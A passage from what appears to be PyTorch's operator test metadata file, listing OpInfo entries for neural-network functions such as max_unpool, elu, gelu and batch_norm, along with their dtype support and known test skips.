sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool2d', variant_test_name='grad', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_grad=False, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool3d', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool3d', variant_test_name='grad', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.linear', aten_name='linear', supports_autograd=True, sample_inputs_func=sample_inputs_linear, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # linear calls mm under the hood which is nondeterministic on CUDA # https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html#torch.use_deterministic_algorithms gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_expanded_weight=True, decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('nn.functional.bilinear', aten_name='bilinear', supports_autograd=True, sample_inputs_func=sample_inputs_bilinear, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('nn.functional.glu', aten_name='glu', supports_autograd=True, sample_inputs_func=sample_inputs_glu, dtypes=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo( 'nn.functional.elu', aten_backward_name='elu_backward', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.elu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), OpInfo( 'nn.functional.prelu', aten_backward_name='prelu_backward', ref=lambda x, weight: np.maximum(0., x) + np.minimum(0., x) * (weight if x.ndim == 1 else weight.reshape([weight.size if i == 1 else 1 for i in range(0, x.ndim)])), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_nn_functional_prelu, decorators=[ # FIXME: second derivative is implemented but seems to be incorrect # https://github.com/pytorch/pytorch/issues/68760 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient # https://github.com/pytorch/pytorch/issues/68752 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ], ), UnaryUfuncInfo( 'nn.functional.celu', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x / alpha) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.celu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.rrelu', aten_backward_name='rrelu_with_noise_backward', op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.rrelu, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'lower': 0., 'upper': 1.}, {'lower': 0., 'upper': 1.}), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(partial(torch.nn.functional.rrelu, inplace=True), input, *args, **kwargs), decorators=( DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # In-place operations do not play well with forward AD # https://github.com/pytorch/pytorch/issues/77447 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), UnaryUfuncInfo( 'nn.functional.selu', ref=lambda x, inplace=False: 1.0507009873554804934193349852946 * ( np.maximum(0., x) + np.minimum(0., 1.6732632423543772848170429916717 * (np.exp(x) - 1)) ), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # depends on 'elu' supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=lambda x: torch.nn.functional.selu(x, inplace=True), decorators=[ # Not implemented yet (depends on 'elu_') DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-2, rtol=1.8e-2), torch.bfloat16: tol(atol=1e-2, rtol=1.8e-2) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.silu', aten_backward_name='silu_backward', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_autograd=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), ) ), # TODO: combine this with the nn.functional.silu OpInfo when # complex autodiff for silu is supported or when # the forward bug is fixed # Note: silu errors when given inputs that require grad # but it doesn't support grad in their dtype # This is why the dtypes list above passes test_dtypes, # because it's getting lucky and failing in forward # because test_dtypes sets requires_grad to True # THIS IS A BUG UnaryUfuncInfo( 'nn.functional.silu', variant_test_name='complex', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=complex_types(), dtypesIfCUDA=empty_types(), supports_forward_ad=False, supports_autograd=False, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), # FIXME: intentionally misreports dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # FIXME: numpy reference diverges: Comparing (nan+nanj) and (-0+0j) DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.complex64, torch.cdouble)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.complex64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.complex64,)))), UnaryUfuncInfo( 'nn.functional.hardsigmoid', aten_backward_name='hardsigmoid_backward', ref=reference_hardsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=False, supports_gradgrad=False, supports_forward_ad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.hardsigmoid, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-04, rtol=0.001)}), 'TestUnaryUfuncs', device_type='cuda',), ], skips=[ # still want to test that first derivative works though second derivative isn't supported DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_gradgrad"), # produces 0 instead of nan on ROCM DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_extremal", device_type='cuda', active_if=(TEST_WITH_ROCM)), ] ), UnaryUfuncInfo( 'nn.functional.logsigmoid', aten_name="log_sigmoid", aten_backward_name='log_sigmoid_backward', ref=reference_logsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=False, supports_forward_ad=True, supports_gradgrad=True, # autodiff_nonfusible_nodes=["aten::log_sigmoid"], decorators=[ DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_large'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), ], skips=( # Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cpu'), ), ), UnaryUfuncInfo( 'nn.functional.mish', aten_backward_name='mish_backward', ref=lambda x: x * np.tanh(reference_softplus(x)), dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.mish, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda',), ], ), UnaryUfuncInfo( 'nn.functional.softsign', ref=lambda x: x / (np.abs(x) + 1), dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1.3e-04)}), 'TestUnaryUfuncs',), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int, torch.int8)), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.complex128,)), # pytorch computes (0+nanj), numpy computes (-5e-18-1j) for input (-501.-1.0000e+20j) DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64,)),), ), UnaryUfuncInfo( 'nn.functional.tanhshrink', ref=lambda x: x - np.tanh(x), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo( toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1.6e-02)}), 'TestUnaryUfuncs',), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], skips=( # in each case, pytorch will produce a nan while numpy will not DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_small", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_extremal", dtypes=(torch.complex64, torch.complex128), device_type='cpu', active_if=(IS_MACOS or IS_WINDOWS)), ), ), OpInfo( 'nn.functional.threshold', aten_backward_name='threshold_backward', ref=lambda x, threshold, value: np.where(x > threshold, x, value).astype(x.dtype), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_threshold, ), OpInfo( "nn.functional.triplet_margin_loss", sample_inputs_func=sample_inputs_triplet_margin_loss, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( "nn.functional.triplet_margin_with_distance_loss", sample_inputs_func=partial(sample_inputs_triplet_margin_loss, with_distance=True), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # This test cannot handle a callable passed to `distance_function`. If we would use # `distance_function=None`, the test would pass fine. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), DecorateInfo( unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive", ), ), ), BinaryUfuncInfo('nextafter', dtypes=floating_types_and(torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False), OpInfo('topk', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_topk), # Multiple variants for batch_norm to test with and without cuDNN disabled # See https://github.com/pytorch/pytorch/pull/63218#discussion_r688549391 for more details OpInfo('nn.functional.batch_norm', aten_name='batch_norm', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_batch_norm, skips=( # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.bfloat16,)), # see https://github.com/pytorch/pytorch/issues/76283 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type="cpu"), # Trying to use forward AD with miopen_batch_norm that does not support it # because it has not been implemented yet. DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type="cuda", active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), # This variant tests batch_norm with cuDNN disabled only on CUDA devices OpInfo('nn.functional.batch_norm', variant_test_name='without_cudnn', aten_name='batch_norm', dtypes=empty_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[onlyCUDA, disablecuDNN], skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), sample_inputs_func=sample_inputs_batch_norm), OpInfo( "nn.functional.binary_cross_entropy", aten_backward_name='binary_cross_entropy_backward', sample_inputs_func=sample_inputs_binary_cross_entropy, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, gradcheck_fast_mode=False, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestCudaFuserOpInfo", ), # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestNNCOpInfo", "test_nnc_correctness", ), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-3, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", ), ), skips=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), ), ), # We have to add 2 OpInfo entry for `igamma` and `igammac`.First is the # standard entry, second is to run gradcheck tests on the second argument. BinaryUfuncInfo('igamma', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammainc',), dtypesIfCUDA=floating_types(), # TODO: FIXME supports_rhs_python_scalar=False, supports_autograd=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implemented grad for both inputs # BinaryUfuncInfo('igamma', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments. # op=lambda self, other, **kwargs: torch.igamma(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # skips=( # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"),"), # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails are we permute the arguments function variant # # but not for inplace or method. # DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igamma(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), BinaryUfuncInfo('igammac', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammaincc',), dtypesIfCUDA=floating_types(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igammac', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments # op=lambda self, other, **kwargs: torch.igammac(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # ], # skips=( # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails are we permute the arguments function variant # # but not for inplace or method. # DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igammac(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), OpInfo('nn.functional.softshrink', aten_name="softshrink", aten_backward_name='softshrink_backward', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, ), OpInfo('nn.functional.hardshrink', aten_name="hardshrink", aten_backward_name='hardshrink_backward', dtypes=floating_types_and(torch.bfloat16,), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardshrink"]), OpInfo('nn.functional.hardtanh', aten_name="hardtanh", aten_backward_name='hardtanh_backward', dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16), backward_dtypes=all_types(), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardtanh"], ), OpInfo('nn.functional.gelu', aten_name="gelu", aten_backward_name='gelu_backward', ref=reference_gelu if TEST_SCIPY else _NOTHING, supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_gelu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::gelu"], skips=( # AssertionError: Tensor-likes are not close! # May not replicate in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'),)), OpInfo('nn.functional.relu6', aten_name="relu6", dtypes=all_types_and(torch.bfloat16), backward_dtypes=floating_types(), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::relu6"]), OpInfo('mm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mm), OpInfo('mode', op=torch.mode, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Resized a non-empty tensor but did not warn about it DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), ), sample_inputs_func=sample_inputs_mode,), MvlGammaInfo(variant_test_name='mvlgamma_p_1', domain=(1, None), skips=skips_mvlgamma() + \ (DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)),), sample_kwargs=lambda device, dtype, input: ({'p': 1}, {'d': 1})), MvlGammaInfo(variant_test_name='mvlgamma_p_3', domain=(2, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 3}, {'d': 3})), MvlGammaInfo(variant_test_name='mvlgamma_p_5', domain=(3, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 5}, {'d': 5})), BinaryUfuncInfo('ne', ref=np.not_equal, aliases=('not_equal',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False), OpInfo('narrow', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_narrow), UnaryUfuncInfo('neg', aliases=('negative', ), ref=np.negative, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), error_inputs_func=error_inputs_neg, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 